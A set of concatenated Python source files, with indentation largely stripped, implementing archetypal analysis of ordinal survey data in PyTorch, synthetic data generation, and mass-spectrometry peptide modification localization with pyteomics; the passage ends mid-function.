self.plots._attribute_scatter_plot(self.Z,self.X_hat,attributes,self.type,self.p, save_figure, filename,title)
elif plot_type == "loss_plot":
self.plots._loss_plot(self.loss,self.type, save_figure, filename,title)
elif plot_type == "mixture_plot":
self.plots._mixture_plot(self.Z,self.A,self.type, save_figure, filename,title)
elif plot_type == "barplot":
self.plots._barplot(self.Z,self.columns,archetype_number,self.type, self.p, save_figure, filename,title)
elif plot_type == "barplot_all":
self.plots._barplot_all(self.Z,self.columns, self.type, self.p, save_figure, filename,title)
elif plot_type == "typal_plot":
self.plots._typal_plot(self.Z,types,weighted, save_figure, filename,title)
elif plot_type == "pie_chart":
self.plots._pie_chart(self.A, subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "attribute_distribution":
self.plots._attribute_distribution(self.A,self.Z,subject_indexes,self.columns,self.p,self.type, attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "circular_typal_barplot":
self.plots._circular_typal_barplot(self.type,self.Z, types, archetype_number,self.columns,self.p, save_figure, filename, title)
def _save(self,filename):
if not self.with_synthetic_data:
file = open("results/" + self.type + "_" + filename + '.obj','wb')
else:
file = open("synthetic_results/" + self.type + "_" + filename + '.obj','wb')
pickle.dump(self, file)
file.close()
########## ORDINAL ARCHETYPAL ANALYSIS RESULT ##########
class _OAA_result:
plots = _plots()
def __init__(self, A, B, X, n_iter, b, Z, X_tilde, Z_tilde, X_hat, loss, K, p, time, columns,type,sigma, with_synthetic_data = False):
self.A = A
self.B = B
self.X = X
self.n_iter = len(loss)
self.b = b
self.sigma = sigma
self.X_tilde = X_tilde
self.Z_tilde = Z_tilde
self.X_hat = X_hat
self.loss = loss
self.Z = Z
self.K = K
self.p = p
self.time = time
self.columns = columns
self.type = type
self.with_synthetic_data = with_synthetic_data
self.N = len(self.X[0,:])
def _print(self):
if self.type == "RBOAA":
type_name = "Response Bias Ordinal Archetypal"
else:
type_name = "Ordinal Archetypal"
print("/////////////// INFORMATION ABOUT " + type_name.upper() + " ANALYSIS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\")
print(f"▣ The " + type_name + " Analysis was computed using " + str(self.K) + " archetypes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(len(self.X)) + " attributes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(self.N) + " subjects.")
print(f"▣ The " + type_name + " Analysis ran for " + str(self.n_iter) + " iterations.")
print(f"▣ The " + type_name + " Analysis took " + str(self.time) + " seconds to complete.")
print(f"▣ The final loss was: {self.loss[-1]}.")
def _plot(self,plot_type, attributes, archetype_number, types, weighted, subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title):
if plot_type == "PCA_scatter_plot":
self.plots._PCA_scatter_plot(self.Z,self.X_hat,self.type, save_figure, filename,title)
elif plot_type == "attribute_scatter_plot":
self.plots._attribute_scatter_plot(self.Z,self.X_hat,attributes,self.type, self.p, save_figure, filename,title)
elif plot_type == "loss_plot":
self.plots._loss_plot(self.loss,self.type, save_figure, filename,title)
elif plot_type == "mixture_plot":
self.plots._mixture_plot(self.Z,self.A,self.type, save_figure, filename,title)
elif plot_type == "barplot":
self.plots._barplot(self.Z,self.columns,archetype_number,self.type,self.p, save_figure, filename,title)
elif plot_type == "barplot_all":
self.plots._barplot_all(self.Z,self.columns, self.type, self.p, save_figure, filename,title)
elif plot_type == "typal_plot":
self.plots._typal_plot(self.Z,types,weighted, save_figure, filename,title)
elif plot_type == "pie_chart":
self.plots._pie_chart(self.A,subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "attribute_distribution":
self.plots._attribute_distribution(self.A,self.Z,subject_indexes,self.columns,self.p,self.type,attribute_indexes, archetype_dataframe, save_figure, filename,title)
elif plot_type == "circular_typal_barplot":
self.plots._circular_typal_barplot(self.type,self.Z, types, archetype_number,self.columns,self.p,save_figure, filename, title)
def _save(self,filename):
if not self.with_synthetic_data:
file = open("results/" + self.type + "_" + filename + '.obj','wb')
else:
file = open("synthetic_results/" + self.type + "_" + filename + '.obj','wb')
pickle.dump(self, file)
        file.close()

# ===== end of file: AAM/AA_result_class.py (package: AA-module) =====
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from timeit import default_timer as timer
from AAM.AA_result_class import _OAA_result
from AAM.loading_bar_class import _loading_bar
########## ORDINAL ARCHETYPAL ANALYSIS CLASS ##########
class _OAA:
########## HELPER FUNCTION // EARLY STOPPING ##########
def _early_stopping(self):
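        # Stop when the improvement over the most recent ~1% of iterations falls below
        # 1e-5 of the total improvement accumulated since the start of training.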
next_imp = self.loss[-round(len(self.loss)/100)]-self.loss[-1]
prev_imp = (self.loss[0]-self.loss[-1])*1e-5
return next_imp < prev_imp
########## HELPER FUNCTION // A AND B ##########
def _apply_constraints_AB(self,A):
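        # Softmax along dim=1 keeps each row of A and B on the probability simplex
        # (non-negative entries summing to one), as archetypal analysis requires.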
m = nn.Softmax(dim=1)
return m(A)
########## HELPER FUNCTION // BETAS ##########
def _apply_constraints_beta(self,b):
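        # Softmax gives p positive increments summing to one; their cumulative sum
        # (last element, always 1, dropped) yields p-1 ordered boundaries in (0, 1).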
m = nn.Softmax(dim=0)
return torch.cumsum(m(b), dim=0)[:len(b)-1]
########## HELPER FUNCTION // SIGMA ##########
def _apply_constraints_sigma(self,sigma):
m = nn.Softplus()
return m(sigma)
########## HELPER FUNCTION // ALPHA ##########
def _calculate_alpha(self,b):
b_j = torch.cat((torch.tensor([0.0]),b),0)
b_j_plus1 = torch.cat((b,torch.tensor([1.0])),0)
alphas = (b_j_plus1+b_j)/2
return alphas
########## HELPER FUNCTION // X_tilde ##########
def _calculate_X_tilde(self,X,alphas):
X_tilde = alphas[X.long()-1]
return X_tilde
########## HELPER FUNCTION // X_hat ##########
def _calculate_X_hat(self,X_tilde,A,B):
Z = B @ X_tilde
X_hat = A @ Z
return X_hat
########## HELPER FUNCTION // LOSS ##########
def _calculate_loss(self,Xt, X_hat, b, sigma):
pad = nn.ConstantPad1d(1, 0)
b = pad(b)
b[-1] = 1.0
z_next = (b[Xt] - X_hat)/sigma
z_prev = (b[Xt-1] - X_hat)/sigma
z_next[Xt == len(b)+1] = np.inf
z_prev[Xt == 1] = -np.inf
P_next = torch.distributions.normal.Normal(0, 1).cdf(z_next)
P_prev = torch.distributions.normal.Normal(0, 1).cdf(z_prev)
neg_logP = -torch.log(( P_next - P_prev ) +1e-10)
loss = torch.sum(neg_logP)
return loss
########## HELPER FUNCTION // ERROR ##########
def _error(self,Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint):
A = self._apply_constraints_AB(A_non_constraint)
B = self._apply_constraints_AB(B_non_constraint)
b = self._apply_constraints_beta(b_non_constraint)
sigma = self._apply_constraints_sigma(sigma_non_constraint)
alphas = self._calculate_alpha(b)
X_tilde = self._calculate_X_tilde(Xt,alphas)
X_hat = self._calculate_X_hat(X_tilde,A,B)
loss = self._calculate_loss(Xt, X_hat, b, sigma)
return loss
########## COMPUTE ARCHETYPES FUNCTION OF OAA ##########
def _compute_archetypes(
self,
X,
K,
p,
n_iter,
lr,
mute,
columns,
with_synthetic_data = False,
early_stopping = False,
for_hotstart_usage = False):
########## INITIALIZATION ##########
self.N, self.M = len(X.T), len(X.T[0,:])
Xt = torch.tensor(X.T, dtype = torch.long)
self.loss = []
start = timer()
A_non_constraint = torch.autograd.Variable(torch.randn(self.N, K), requires_grad=True)
B_non_constraint = torch.autograd.Variable(torch.randn(K, self.N), requires_grad=True)
b_non_constraint = torch.autograd.Variable(torch.rand(p), requires_grad=True)
sigma_non_constraint = torch.autograd.Variable(torch.rand(1), requires_grad=True)
optimizer = optim.Adam([A_non_constraint,
B_non_constraint,
b_non_constraint,
sigma_non_constraint], amsgrad = True, lr = lr)
if not mute:
loading_bar = _loading_bar(n_iter, "Ordinal Archetypal Analysis")
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint)
self.loss.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.loss) > 200 and self._early_stopping():
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints_AB(A_non_constraint).detach().numpy()
B_f = self._apply_constraints_AB(B_non_constraint).detach().numpy()
b_f = self._apply_constraints_beta(b_non_constraint)
alphas_f = self._calculate_alpha(b_f)
X_tilde_f = self._calculate_X_tilde(Xt,alphas_f).detach().numpy()
Z_tilde_f = (self._apply_constraints_AB(B_non_constraint).detach().numpy() @ X_tilde_f)
sigma_f = self._apply_constraints_sigma(sigma_non_constraint).detach().numpy()
X_hat_f = self._calculate_X_hat(X_tilde_f,A_f,B_f)
end = timer()
time = round(end-start,2)
Z_f = B_f @ X_tilde_f
########## CREATE RESULT INSTANCE ##########
result = _OAA_result(
A_f.T,
B_f.T,
X,
n_iter,
b_f.detach().numpy(),
Z_f.T,
X_tilde_f.T,
Z_tilde_f.T,
X_hat_f.T,
self.loss,
K,
p,
time,
columns,
"OAA",
sigma_f,
with_synthetic_data=with_synthetic_data)
if not mute:
result._print()
########## RETURN RESULT IF REGULAR, RETURN MATRICIES IF HOTSTART USAGE ##########
if not for_hotstart_usage:
return result
else:
A_non_constraint_np = A_non_constraint.detach().numpy()
B_non_constraint_np = B_non_constraint.detach().numpy()
sigma_non_constraint_np = sigma_non_constraint.detach().numpy()
b_non_constraint_np = b_non_constraint.detach().numpy()
            return A_non_constraint_np, B_non_constraint_np, sigma_non_constraint_np, b_non_constraint_np

# ===== end of file: AAM/OAA_class.py (package: AA-module) =====
import torch
import torch.nn as nn
import torch.optim as optim
from timeit import default_timer as timer
from AAM.loading_bar_class import _loading_bar
from AAM.AA_result_class import _CAA_result
########## CONVENTIONAL ARCHETYPAL ANALYSIS CLASS ##########
class _CAA:
########## HELPER FUNCTION // EARLY STOPPING ##########
def _early_stopping(self):
next_imp = self.RSS[-round(len(self.RSS)/100)]-self.RSS[-1]
prev_imp = (self.RSS[0]-self.RSS[-1])*1e-5
return next_imp < prev_imp
########## HELPER FUNCTION // CALCULATE ERROR FOR EACH ITERATION ##########
def _error(self, X,B,A):
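        # Residual sum of squares of the archetypal reconstruction, ||X - X B A||_F^2:
        # Z = X B are the archetypes and A mixes them back to approximate each sample.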
return torch.norm(X - X@B@A, p='fro')**2
########## HELPER FUNCTION // A CONSTRAINTS ##########
def _apply_constraints(self, A):
m = nn.Softmax(dim=0)
return m(A)
########## COMPUTE ARCHETYPES FUNCTION OF CAA ##########
def _compute_archetypes(self, X, K, p, n_iter, lr, mute,columns,with_synthetic_data = False, early_stopping = False, for_hotstart_usage = False):
########## INITIALIZATION ##########
self.RSS = []
start = timer()
if not mute:
loading_bar = _loading_bar(n_iter, "Conventional Arhcetypal Analysis")
N, _ = X.T.shape
Xt = torch.tensor(X,requires_grad=False).float()
A = torch.autograd.Variable(torch.rand(K, N), requires_grad=True)
B = torch.autograd.Variable(torch.rand(N, K), requires_grad=True)
optimizer = optim.Adam([A, B], amsgrad = True, lr = lr)
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(Xt, self._apply_constraints(B), self._apply_constraints(A))
self.RSS.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.RSS) > 200 and self._early_stopping():
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints(A).detach().numpy()
B_f = self._apply_constraints(B).detach().numpy()
Z_f = (Xt@self._apply_constraints(B)).detach().numpy()
X_hat_f = X@B_f@A_f
end = timer()
time = round(end-start,2)
result = _CAA_result(A_f, B_f, X, X_hat_f, n_iter, self.RSS, Z_f, K, p, time,columns,"CAA",with_synthetic_data = with_synthetic_data)
if not mute:
result._print()
if not for_hotstart_usage:
return result
else:
            return A.detach().numpy(), B.detach().numpy()

# ===== end of file: AAM/CAA_class.py (package: AA-module) =====
import numpy as np
from scipy.stats import norm
import pickle
########## CLASS FOR CREATING SYNTHETIC DATA ##########
class _synthetic_data:
########## INITIALIZATION - CREATES THE DATA ##########
def __init__(self, N, M ,K, p, sigma, rb, a_param, b_param, sigma_std = 0):
self.N = N
self.M = M
self.K = K
self.p = p
self.columns = ["SQ"+str(i) for i in range(1, M+1)]
self.X, self.Z, self.Z_alpha, self.A, self.betas = self.X(N=N, M=M, K=K, p=p, sigma=sigma, rb=rb, a_param=a_param, b_param=b_param, sigma_std = sigma_std)
########## IF THERE IS RESPONSE BIAS IN THE DATA ##########
def biasedBetas(self, N, p, b_param):
b = np.array([b_param]*p)
return np.random.dirichlet(b, size=N)
    ########## CONSTRAINTS ON THE RESPONSE BIAS BETAS ##########
def betaConstraintsBias(self, betas):
N, J = betas.shape
new_betas = np.empty((N,J))
denoms = np.sum(betas,axis=1)
for i in range(N):
for j in range(J):
new_betas[i,j] = np.sum(betas[i,:j+1])/denoms[i]
# Return and remove the column of ones
return new_betas[:,:-1]
    ########## CONSTRAINTS ON THE NON-RESPONSE-BIAS BETAS ##########
def betaConstraints(self, betas):
new_betas = np.empty(len(betas))
denom = sum(betas)
for i in range(len(new_betas)):
new_betas[i] = np.sum(betas[:i+1]) / denom
return new_betas[:-1]
########## SOFTPLUS HELPER FUNCTION ##########
def softplus(self, sigma, sigma_std):
if sigma_std == 0:
return np.log(1 + np.exp(sigma))
else:
sigmas = []
for n in range(self.N):
sigmas.append(np.log(1 + np.exp(sigma + np.random.uniform(-1,1,1)*sigma_std)))
sigmasMatrix = np.repeat(sigmas, self.M, axis=1)
return sigmasMatrix
    ########## HELPER FUNCTION, CALCULATES THE Z ARCHETYPE MATRIX ##########
def get_Z(self, N, M, K, p, rb, b_param):
# Ensure reproducibility
np.random.seed(42)
# Check to ensure that there are no NaN's
if b_param < 0.01:
b_param = 0.01
betas = np.array([b_param]*p)
betas = self.betaConstraints(betas)
alphas = np.empty(p)
alphas[0] = (0 + betas[0]) / 2
alphas[-1] = (1+ betas[-1]) / 2
for i in range(len(betas)-1):
alphas[i+1] = (betas[i] + betas[i+1]) / 2
Z_ordinal = np.ceil(np.random.uniform(0, 1, size = (M,K))*p).astype(int)
Z_alpha = alphas[Z_ordinal-1]
if rb == True:
betas = self.biasedBetas(N=N, p=p, b_param=b_param)
betas = self.betaConstraintsBias(betas)
return Z_ordinal, Z_alpha, betas
    ########## HELPER FUNCTION, CALCULATES THE A LINEAR COMBINATION MATRIX ##########
def get_A(self, N, K, a_param):
np.random.seed(42) # set another seed :)
# Constrain a_param to avoid NaN's
if a_param < 0.01:
a_param = 0.01
alpha = np.array([a_param]*K)
return np.random.dirichlet(alpha, size=N).transpose()
########## HELPER FUNCTION, CALCULATES THE D DENSITY MATRIX ##########
def get_D(self, X_rec, betas, sigma, rb):
M, N = X_rec.shape
if rb == False:
J = len(betas)
D = np.empty((J+2, M, N))
for j in range(J+2):
# Left-most tail
if j == 0:
D[j] = np.ones((M,N))*(np.inf*(-1))
# Right-most tail
elif j == J+1:
D[j] = np.ones((M,N))*(np.inf)
else:
D[j] = (betas[j-1] - X_rec)/(sigma.T+1e-16) ## Add softplus(sigma)
else:
J = len(betas[0,:])
D = np.empty((J+2, M, N))
for j in range(J+2):
if j == 0:
D[j] = np.ones((M,N))*(np.inf*(-1))
elif j == J+1:
D[j] = np.ones((M,N))*(np.inf)
else:
D[j] = (betas[:,j-1] - X_rec)/((sigma.T+1e-16)) ## Add softplus(sigma)
return D - np.mean(D[1:-1])
########## HELPER FUNCTION, CALCULATES THE PROBABILITY FROM THE DENSITY MATRIX ##########
def Probs(self, D):
J, M, N = D.shape
probs = np.empty((J-1, M, N))
for i in range(J):
if i != J-1:
probs[i,:,:] = norm.cdf(D[i+1], loc=0, scale=1) - norm.cdf(D[i], loc=0, scale=1)
return probs
########## HELPER FUNCTION, SAMPLES FROM PROBABILITY MATRIX TO GET CATEGORICAL ##########
def toCategorical(self, probs):
categories = np.arange(1, len(probs)+1)
J, M, N = probs.shape
X_cat = np.empty((M,N))
for m in range(M):
for n in range(N):
X_cat[m,n] = int(np.random.choice(categories, p = list(probs[:,m,n])))
X_cat = X_cat.astype(int)
return X_cat
    ########## CALCULATES DATA WITH HELP OF ALL OTHER FUNCTIONS ##########
def X(self, M, N, K, p, sigma, rb=False, a_param=1, b_param=100, sigma_std = 0):
Z_ordinal, Z_alpha, betas = self.get_Z(N=N,M=M, K=K, p=p, rb=rb, b_param=b_param)
A = self.get_A(N, K, a_param=a_param)
X_rec = Z_alpha@A
D = self.get_D(X_rec, betas, self.softplus(sigma, sigma_std), rb=rb)
probs = self.Probs(D)
X_final = self.toCategorical(probs)
return X_final, Z_ordinal, Z_alpha, A, betas
########## SAVES THE DATA LOCALLY ON PC ##########
def _save(self,type,filename):
file = open("synthetic_results/" + type + "_" + filename + '_metadata' + '.obj','wb')
pickle.dump(self, file)
        file.close()

# ===== end of file: AAM/synthetic_data_class.py (package: AA-module) =====
import pandas as pd
import numpy as np
from collections import defaultdict, Counter
import logging
from pyteomics import mass
try:
from pyteomics import cmass
except ImportError:
cmass = mass
import string
from . import utils, io
logger = logging.getLogger(__name__)
def get_theor_spectrum(peptide, acc_frag, ion_types=('b', 'y'), maxcharge=1,
aa_mass=mass.std_aa_mass, modifications=None, **kwargs):
"""
Calculates theoretical spectra in two ways: usual one and in integer format (mz / frag_acc).
Parameters
----------
peptide : list
Peptide sequence.
acc_frag : float
Fragment mass accuracy in Da.
ion_types : tuple
Fragment ion types. ('b', 'y')
maxcharge: int
Maximum charge of fragment ion.
aa_mass: dict
Amino acid masses
modifications : dict or None
Dict of modifications applied to peptide (int position -> float mass shift)
Returns
-------
Returns spectrum in two ways (usual, integer). Usual is a dict with key [ion type, charge] and m/z as a value.
Integer is a dict, where key is ion type and value is a set of integers (m/z / fragment accuracy).
"""
if not isinstance(peptide, list):
raise Exception('peptide is not a list: {!r}'.format(peptide))
peaks = defaultdict(list)
theor_set = defaultdict(list)
aa_mass = aa_mass.copy()
H = mass.nist_mass['H'][0][0]
nterm_mod = aa_mass.pop('H-', H)
OH = H + mass.nist_mass['O'][0][0]
cterm_mod = aa_mass.pop('-OH', OH)
if modifications is None:
modifications = {}
for ind, pep in enumerate(peptide[:-1]):
for ion_type in ion_types:
nterminal = ion_type[0] in 'abc'
for charge in range(1, maxcharge + 1):
if ind == 0:
if nterminal:
mz = cmass.fast_mass2(
pep, ion_type=ion_type, charge=charge,
aa_mass=aa_mass, **kwargs) + (nterm_mod - H + modifications.get(1, 0.)) / charge
else:
mz = cmass.fast_mass2(''.join(peptide[1:]), ion_type=ion_type, charge=charge,
aa_mass=aa_mass, **kwargs) + (cterm_mod - OH) / charge + sum(
val for key, val in modifications.items() if key > 1) / charge
else:
if nterminal:
mz = peaks[ion_type, charge][-1] + (modifications.get(ind + 1, 0.) + aa_mass[pep]) / charge
else:
mz = peaks[ion_type, charge][-1] - (modifications.get(ind + 1, 0.) + aa_mass[pep]) / charge
peaks[ion_type, charge].append(mz)
theor_set[ion_type].append(int(mz / acc_frag))
theor_set = {k: set(v) for k, v in theor_set.items()}
# if modifications:
# utils.internal('aa_mass: %s', aa_mass)
# utils.internal('Theoretical spectrum with modifications: %s, %s, %s', peptide, modifications, peaks)
return peaks, theor_set
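# A minimal usage sketch (hypothetical values): theoretical b/y ions for a peptide given
# as a list of residues, with 0.02 Da fragment accuracy and fragment charges up to 2+:
#     peaks, theor_set = get_theor_spectrum(list('PEPTIDE'), 0.02, maxcharge=2)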
def RNHS_fast(spectrum_idict, theoretical_set, min_matched, ion_types=('b', 'y')):
"""
Matches experimental and theoretical spectra in int formats.
Parameters
----------
spectrum_idict : list
Experimental spectrum in integer format. Output of preprocess_spectrum.
theoretical_set: dict
A dict where key is ion type and value is a set of integers (m/z / fragment accuracy).
Output of get_theor_spec function.
min_matched : int
        Minimum number of peaks to be matched.
ion_types : tuple
Fragment ion types. ('b', 'y')
Returns
-------
Number of matched peaks, score.
"""
matched = []
isum = 0
for ion_type in ion_types:
match = 0
for ion in theoretical_set[ion_type]:
if ion in spectrum_idict:
match += 1
isum += spectrum_idict[ion]
matched.append(match)
matched_approx = sum(matched)
if matched_approx >= min_matched:
return matched_approx, np.prod([np.math.factorial(m) for m in matched]) * isum
else:
return 0, 0
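# The returned score is hyperscore-like: the product of the factorials of the matched-peak
# counts per ion series, multiplied by the summed intensity of all matched peaks.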
_preprocessing_cache = {}
def preprocess_spectrum(reader, spec_id, kwargs, acc=0.01):
"""
    Prepares an experimental spectrum for matching by converting it to integer format.
    Default preprocessing settings: maximum number of peaks is 100, dynamic range is 1000.
Parameters
----------
reader : file reader
Spectrum file reader
spec_id : str
Spectrum id.
Returns
-------
List of experimental mass spectrum in integer format.
"""
spectrum = _preprocessing_cache.setdefault((reader, spec_id), {})
if spectrum:
# logger.debug('Returning cached spectrum %s', spec_id)
return spectrum
# logger.debug('Preprocessing new spectrum %s', spec_id)
original = reader[spec_id]
maxpeaks = kwargs.get('maxpeaks', 100)
dynrange = kwargs.get('dynrange', 1000)
mz_array = original['m/z array']
int_array = original['intensity array']
int_array = int_array.astype(np.float32)
if dynrange:
i = int_array > int_array.max() / dynrange
int_array = int_array[i]
mz_array = mz_array[i]
if maxpeaks and int_array.size > maxpeaks:
i = np.argsort(int_array)[-maxpeaks:]
j = np.argsort(mz_array[i])
int_array = int_array[i][j]
mz_array = mz_array[i][j]
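    # Bin m/z values into integer bins of width `acc`; each peak also fills its two
    # neighboring bins, so a theoretical ion one bin away still registers as a match.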
tmp = (mz_array / acc).astype(int)
for idx, mt in enumerate(tmp):
i = int_array[idx]
spectrum[mt] = max(spectrum.get(mt, 0), i)
spectrum[mt - 1] = max(spectrum.get(mt - 1, 0), i)
spectrum[mt + 1] = max(spectrum.get(mt + 1, 0), i)
return spectrum
def peptide_isoforms(peptide, m, sites, prev_aa, next_aa):
"""
Parameters
----------
peptide : list
Peptide sequence
    m : str
        Modification label to apply.
    sites : set
        Amino acids eligible for modification.
    prev_aa : str
        Preceding amino acid ('-' if the peptide is at the protein N-terminus).
    next_aa : str
        Following amino acid ('-' if the peptide is at the protein C-terminus).
    Returns
    -------
    list of tuples
"""
isoforms = []
    if ('N-term' in sites or ('Protein N-term' in sites and prev_aa == '-')) and len(peptide[0]) == 1 and peptide[0] not in sites:
isoforms.append((m + peptide[0],) + tuple(peptide[1:]))
    if ('C-term' in sites or ('Protein C-term' in sites and next_aa == '-')) and len(peptide[-1]) == 1 and peptide[-1] not in sites:
isoforms.append(tuple(peptide[:-1]) + (m + peptide[-1],))
for ind, a in enumerate(peptide):
if a in sites:
isoforms.append(tuple(peptide[:ind]) + (m + a,) + tuple(peptide[ind + 1:]))
return isoforms
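# Example (illustrative): placing label 'a' on the serines of 'PESTS' with non-terminal
# flanking residues:
#     peptide_isoforms(list('PESTS'), 'a', {'S'}, 'K', 'R')
#     -> [('P', 'E', 'aS', 'T', 'S'), ('P', 'E', 'S', 'T', 'aS')]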
def get_candidates_from_aastat(mass_shifts_table, labels, threshold=1.5):
"""
    Get localization candidates from amino acid statistics.
Parameters
----------
mass_shifts_table : DataFrame
DF with amino acid statistics for all mass shifts.
labels : list
List of amino acids that should be considered.
threshold : float
Threshold to be considered as significantly changed.
    Returns
-------
Series with mass shift as index and list of candidates as value.
"""
df = mass_shifts_table.loc[:, labels]
ms, aa = np.where(df > threshold)
out = {ms: [] for ms in mass_shifts_table.index}
for i, j in zip(ms, aa):
out[df.index[i]].append(df.columns[j])
return pd.Series(out)
def get_full_set_of_candidates(locmod_df):
"""
Build list of dicts from all_candidates column taking into account the sums of modification.
Parameters
----------
locmod_df : DataFrame
DF with candidates for mass shifts.
Returns
-------
Series
"""
out = defaultdict(list)
for ind in locmod_df.index:
out[ind].append({ind: locmod_df.at[ind, 'all candidates']})
if isinstance(locmod_df.at[ind, 'sum of mass shifts'], list):
for pair in locmod_df.at[ind, 'sum of mass shifts']:
tmp_dict = {}
tmp_dict[pair[0]] = locmod_df.at[pair[0], 'all candidates']
if len(pair) > 1:
tmp_dict[pair[1]] = locmod_df.at[pair[1], 'all candidates']
out[ind].append(tmp_dict)
return pd.Series(out)
def localization_of_modification(ms, ms_label, row, loc_candidates, params_dict, spectra_dict, mass_shift_dict):
"""
Localizes modification for mass shift in a peptide.
If two peptides isoforms have the same score, modification counts as 'non-localized'.
Parameters
----------
ms: float
mass shift
ms_label : str
Label for considered mass shift.
row : DataFrame row
Data Frame row for filtered PSMs data.
loc_candidates : list
List of dicts with candidates for localization. locmod_df['loc candidates']
params_dict : dict
Dict with all parameters.
spectra_dict : dict
Keys are filenames and values are Pyteomics readers.
    mass_shift_dict : dict
        Keys are mass shift labels and values are mass shift values.
Returns
-------
Counter of localizations, top isoform, score difference
"""
mass_dict_0 = mass.std_aa_mass.copy()
mass_dict_0.update(params_dict['fix_mod'])
peptide = params_dict['peptides_column']
prev_aa = params_dict['prev_aa_column']
next_aa = params_dict['next_aa_column']
charge = row[params_dict['charge_column']]
modif_labels = string.ascii_lowercase
mod_dict = utils.get_var_mods(row, params_dict)
loc_stat_dict = Counter()
if params_dict['mzml_files']:
scan = row[params_dict['spectrum_column']].split('.')[1].lstrip('0')
spectrum_id = 'controllerType=0 controllerNumber=1 scan=' + scan
else:
spectrum_id = row[params_dict['spectrum_column']]
exp_dict = preprocess_spectrum(spectra_dict[row['file']], spectrum_id, {}, acc=params_dict['frag_acc'],)
top_score, second_score = 0, 0
top_isoform = None
top_terms = None
for terms in loc_candidates:
scores = []
mass_dict = mass_dict_0.copy()
isoform_part = []
new_isoform_part = []
i = 0
isoforms = []
sequences = []
for _ms in terms:
mod_aa = {modif_labels[i] + aa: mass_shift_dict[_ms] + mass_dict[aa] for aa in params_dict['labels']}
mass_dict.update(mod_aa)
mass_dict[modif_labels[i]] = mass_shift_dict[_ms]
if not isoform_part: # first modification within this shift (or whole shift)
isoform_part += peptide_isoforms(list(row[peptide]), modif_labels[i], terms[_ms], row[prev_aa], row[next_aa])
if _ms == ms_label:
# this is the whole-shift modification
isoforms += isoform_part
elif len(terms) == 1:
# two equal mass shifts form this mass shift. Apply the second half
for p in isoform_part:
new_isoform_part += peptide_isoforms(p, modif_labels[i], terms[_ms], row[prev_aa], row[next_aa])
else:
# second mass shift
for p in isoform_part:
new_isoform_part += peptide_isoforms(p, modif_labels[i], terms[_ms], row[prev_aa], row[next_aa])
i += 1
isoforms += new_isoform_part
sequences = [list(x) for x in isoforms]
# utils.internal('Generated %d isoforms for terms %s at shift %s', len(sequences), terms.keys(), ms_label)
for seq in sequences:
# utils.internal('seq = %s', seq)
theor_spec = get_theor_spectrum(seq,
params_dict['frag_acc'], maxcharge=charge, aa_mass=mass_dict, ion_types=params_dict['ion_types'], modifications=mod_dict)
scores.append(RNHS_fast(exp_dict, theor_spec[1], params_dict['min_spec_matched'], ion_types=params_dict['ion_types'])[1])
scores = np.array(scores)
i = np.argsort(scores)[::-1]
scores = scores[i]
sequences = np.array(sequences)[i]
if scores.size:
if scores[0] > top_score:
second_score = top_score
top_score = scores[0]
top_isoform = sequences[0]
top_terms = terms
if scores.size > 1 and scores[1] > second_score:
second_score = scores[1]
if top_isoform is None:
return loc_stat_dict, None, None, None, None
if any(all(sites <= {'C-term', 'N-term'} for sites in terms.values())
for terms in loc_candidates):
# utils.internal('Injecting unmodified spectra for %s', ms)
unmod_spec = get_theor_spectrum(list(row[peptide]), params_dict['frag_acc'], maxcharge=charge,
aa_mass=mass_dict_0, ion_types=params_dict['ion_types'], modifications=mod_dict)
unmod_score = RNHS_fast(exp_dict, unmod_spec[1], params_dict['min_spec_matched'], ion_types=params_dict['ion_types'])[1]
else:
unmod_score = 0
if top_score == second_score or top_score <= unmod_score:
utils.internal('top score = %f, second score = %f, unmod score = %f', top_score, second_score, unmod_score)
loc_stat_dict['non-localized'] += 1
return loc_stat_dict, None, None, None, None
mass_dict = mass_dict_0.copy()
# utils.internal('Top isoform is %s for terms %s (shift %s)', top_isoform, top_terms, ms_label)
i = 0
for _ms in top_terms:
mod_aa = {modif_labels[i] + aa: mass_shift_dict[_ms] + mass_dict[aa] for aa in params_dict['labels']}
mass_dict.update(mod_aa)
mass_dict[modif_labels[i]] = mass_shift_dict[_ms]
i += 1
for ind, a in enumerate(top_isoform):
if len(a) > 1:
if ind == 0:
loc_stat_dict[utils.format_localization_key('N-term', mass_dict[a[0]])] += 1
elif ind == len(top_isoform) - 1:
loc_stat_dict[utils.format_localization_key('C-term', mass_dict[a[0]])] += 1
loc_stat_dict[utils.format_localization_key(a[1], mass_dict[a[0]])] += 1
scorediff = (top_score - second_score) / top_score
top_i = ''.join(top_isoform)
ret = loc_stat_dict, top_i, top_terms, scorediff, utils.loc_positions(top_isoform)
utils.internal('Returning: %s', ret)
return ret
def localization(df, ms, ms_label, locations_ms, params_dict, spectra_dict, mass_shift_dict):
"""
Localizes modification or sum of modifications for mass shift and repeat localization if there are redundant candidates.
If two peptide isoforms have the same max score, modification counts as 'non-localized'.
Parameters
----------
df : DataFrame
DF with filtered peptides for considered mass shift.
ms: float
mass shift
ms_label : str
Considered mass shift label
locations_ms :
locmod_df['loc candidates']
params_dict : dict
        Dict with all parameters.
spectra_dict : dict
Keys are filenames and values are Pyteomics readers.
Returns
-------
Counter of localizations.
"""
logger.info('Localizing %s...', ms_label)
logger.debug('Localizations: %s', locations_ms)
if len(locations_ms) < 2 and list(locations_ms[0].values())[0] == set():
